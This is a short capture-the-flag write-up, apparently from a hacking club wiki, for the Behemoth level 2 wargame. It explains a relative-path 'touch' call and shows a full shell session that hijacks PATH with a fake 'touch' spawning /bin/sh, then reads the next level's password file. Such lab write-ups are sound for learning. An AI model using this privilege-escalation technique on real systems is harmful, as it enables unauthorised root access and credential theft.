Behemoth2 - behemoth3

From JaxHax
Jump to: navigation, search

The challenge would get its pid and attempt to run "touch [pid]". The flaw in this is it wasn't using an absolute path. Because of this it would traverse the PATH variables paths and try to find an executable in the path. To exploit this all we need to do is create a shell script in a tmp folder, then make that temp folder the first path in the PATH variable.

behemoth2@melinda:~$ cd /tmp/thatoneguy1
behemoth2@melinda:/tmp/thatoneguy1$ echo "/bin/sh" > touch
behemoth2@melinda:/tmp/thatoneguy1$ chmod +x touch
behemoth2@melinda:/tmp/thatoneguy1$ PATH=/tmp/thatoneguy1:$PATH
behemoth2@melinda:/tmp/thatoneguy1$ /behemoth/behemoth2
$ cat /etc/behemoth_pass/behemoth3
$ exit